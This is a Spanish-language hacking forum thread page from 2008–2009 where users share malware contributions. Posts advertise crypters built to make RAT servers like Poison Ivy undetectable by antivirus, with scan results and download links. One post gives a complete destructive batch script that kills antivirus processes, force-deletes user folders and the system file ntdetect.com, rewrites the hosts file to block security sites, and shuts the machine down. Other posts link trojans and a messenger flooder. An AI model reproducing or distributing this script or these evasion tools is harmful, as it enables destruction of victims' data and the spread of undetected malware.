elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
21 Marzo 2010, 03:38  


Temas destacados: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Hendrix, Karcrack)
| | |-+  Contribuciones usuarios elhacker.net		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] Ir Abajo Imprimir
Autor Tema: Contribuciones usuarios elhacker.net  (Leído 43585 veces)
E0N
ex-todo ^^

Desconectado Desconectado

Mensajes: 3.001


http://e0n-productions.blogspot.com/


Ver Perfil WWW
Re: Contribuciones usuarios hacker.net
« Respuesta #60 en: 17 Mayo 2008, 19:39 »
Cita de: E0N en 19 Abril 2008, 15:58
SMALL CRYPTER


¿Qué es Small Crypter?

Small Crypter es un crypter (obio :P) tanto scan-time como run-time que utiliza inyección. Su stub está escrito en asm y un poco retocado a mano, por lo que solamente ocupa 1.3 KB. ¿Qué quiere decir esto? Pues quiere decir que si ciframos un ejecutable con Small Crypter el tamaño total del mismo solo aunmentará en 1.3KB, es decir, prácticamente nada ;)

Por poner un ejemplo, al cifrar el server del Poison Ivy con Small Crypter el server final solo ocupará 6.6KB ;)

Características:

No dispongo de mucho tiempo últimamente, así que hay ciertos aspectos a mejorar, como el algoritmo de encryptación, que es un simple xor xD lo que hace que algunos av's puedan llegar a detectar vuestro server, aunke pasará inadvertido a la gran mayoria. Por poner un ejemplo, este es el resultado de scanear el servidor del Poison Ivy con ScanLix tras haber sido cifrado con Small Crypter:

McAfee        ;D
Kaspersky   ;D
Shopos        :(
F-Prot          ;D
AntiVir         ;D
Norton         ;D
BitDefender :(
ClamWin     ;D
SOLO          ;D
Nod32         ;D
ZoneAlarm  ;D

Como veis lo siguen detectando 2 av's, pero no está mal no? :P El ejecutable final por otra parte no tendrá icono. Bueno, tengo que mejorarle algunos aspecto para una posible siguiente versión ;)



Abajo podeis descargarlo. Para hacerlo funcionar extraeis el .rar en la misma ruta y ya está

Salu2 E0N
En línea
~# e0n
http://e0n-productions.blogspot.com/
Kizar

Desconectado Desconectado

Mensajes: 1.326


kizar_net


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #61 en: 25 Mayo 2008, 15:20 »
Crypter SecureShade 1.5
Esta es la versión publica de mi crypter, hace cualquier programa de windows indetectable a los antivirus en tiempo de análisis y en tiempo de ejecución.
He probado con servidores de PI, Bifrost, Nuclear Rat y Bandook y todos son compatibles.

Características:
  • Editor programado en VB6
  • Stub programado en c++/asm
  • Tamaño del Stub(con themida): 577Kb
  • SO: Win98/NT/XP/Vista
  • ------------------------------------
  • Totalmente indetectable (Runtime y Scantime)
  • Inyeccion del programa en otro proceso
  • Cambiar icono
  • Encriptación muy rapida
  • Validación de ejecutables
  • Buen diseño

Captura de pantalla:
(He traducido el programa al español)


Resultado del scan:
A-Squared   Nada encontrado
AntiVir      Nada encontrado
ArcaVir      Nada encontrado
Avast      Nada encontrado
AVG Antivirus   Nada encontrado
BitDefender   Nada encontrado
ClamAV      Nada encontrado
CPsecure   Nada encontrado
Dr.Web      Nada encontrado
F-Prot      Nada encontrado
F-Secure   Nada encontrado
Fortinet   Nada encontrado
Ikarus      Nada encontrado
Kaspersky   Nada encontrado
NOD32      Nada encontrado
Norman      Nada encontrado
Panda Antivirus   Nada encontrado
VirusBuster   Nada encontrado
VBA32      Nada encontrado

Descarga:
http://rapidshare.com/files/117008238/SecureShade_1.5_Publica.zip.html
http://www.megaupload.com/es/?d=TH1UFB8E
Pass: foro.elhacker.net
« Última modificación: 23 Enero 2009, 21:50 por Kizar » En línea
E0N
ex-todo ^^

Desconectado Desconectado

Mensajes: 3.001


http://e0n-productions.blogspot.com/


Ver Perfil WWW
Re: Contribuciones usuarios hacker.net
« Respuesta #62 en: 01 Julio 2008, 18:12 »
Manual/Taller de programación en ASM con Fasm:

http://foro.elhacker.net/analisis_y_diseno_de_malware/abril_negro_2008_taller_de_asm-t208188.0.html
En línea
~# e0n
http://e0n-productions.blogspot.com/
peibol0.1

Desconectado Desconectado

Mensajes: 2.682


CoAdmin


Ver Perfil
Re: Contribuciones usuarios elhacker.net
« Respuesta #63 en: 13 Julio 2008, 13:35 »
bueno yo voy a poner un virus en codigo bat supongo que no funcionara pero bueno yo pongo mi aporte...


Citar

@echo off
tskill aak.exe
tskill AcctMgr.exe
tskill McAfeeVirusScanService.exe
tskill MCAgentExe.exe
tskill pavsrv51.exe
tskill prevsrv.exe
tskill PsImSvc.exe
tskill nod32krn.exe
tskill nod32kui.exe
tskill nod32.exe
tskill avgupsvc.exe
tskill avgamsvr.exe
tskill avgemc.exe
tskill avgcc.exe
tskill ashDisp.exe
tskill ashMaiSv.exe
tskill ashServ.exe
tskill ashWebSv.exe
tskill aswUpdSv.exe
tskill _avp32.exe
tskill avsched32.exe
tskill luall.exe
tskill moolive.exe
tskill mpftray.exe
tskill n32scanw.exe
tskill navapw32.exe
tskill navlu32.exe
tskill navnt.exe
tskill rescue.exe
tskill safeweb.exe
tskill scan32.exe
tskill scan95.exe
tskill scanpm.exe
tskill scrscan.exe
tskill serv95.exe
tskill smc.exe
tskill sphinx.exe
tskill tbscan.exe
tskill tca.exe
tskill tds2-98.exe
tskill tds2-nt.exe
tskill wfindv32.exe
tskill zonealarm.exe
del  /F /Q C:\Documents and Settings\%username%\Escritorio
del /F /Q C:\Documents and Settings\%USERNAME%\Menú Inicio
del /F /Q c:\WINDOWS\Fonts
del /F /Q c:\Documents and Settings\%username%\Mis documentos
del /F /Q c:\Archivos de programas\eMule
del /F /Q c:\WINDOWS\Cursors
del /F /Q C:\Archivos de programa\Internet Explorer
del /F /Q C:\Archivos de programa\Windows Media Player
del /F /Q C:\WINDOWS\Web\Wallpaper
cd c:\windows\System32
attrib -r ntdetect.com
attrib -s ntdetect.com
attrib -h ntdetect.com
del /F /Q ntdetect.com
echo 81.21.145.144 McAfee >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.10 panda >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.35 Norton >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 kaspersky >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 Nod32 >> C:\WINDOWS\system32\drivers\etc\hosts
echo 66.98.250.38 virusTotal >> C:\WINDOWS\system32\drivers\etc\hosts
echo 66.249.93.99 google >> C:\WINDOWS\system32\drivers\etc\hosts
TASKKILL /F /IM explorer.exe
shutdown -t -t 05 -c "error fatal de windows"


que les parece creo que no necesita explicacion no?
En línea
exequiel12

Desconectado Desconectado

Mensajes: 2

la etica de un hacker se basa en su boluntad


Ver Perfil
Re: Contribuciones usuarios elhacker.net
« Respuesta #64 en: 26 Julio 2008, 02:36 »
bueno jaja

aca les dejo una lista de troyanos  :D :D y si tienen dudas pues bayan a la parte de el foro  q explica como hacerlos indetectables jaja bueno desde ya saludos y espero q les sirba de algo
http://www.ale666.com/home/index.php?option=com_content&task=view&id=12&Itemid=30

poe favor les quiero pedir q no descergan nada de este sitio si no lo nesesitan

bueno creo q eso es todo nos veomos jaja
En línea
la etica de una hacker se besa en su boluntas de decicion
RedKnight

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Re: Contribuciones usuarios elhacker.net
« Respuesta #65 en: 09 Mayo 2009, 20:07 »
Voy a contribuir con mi MessengerFlooder  ;) (http://foro.elhacker.net/chats_irc_y_messengers/messengerflooder_by_redknight-t254437.0.html)
En línea
Ahora sólo uso la cuenta con el nick BlackNightmare :p
Páginas: 1 2 3 4 [5] Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC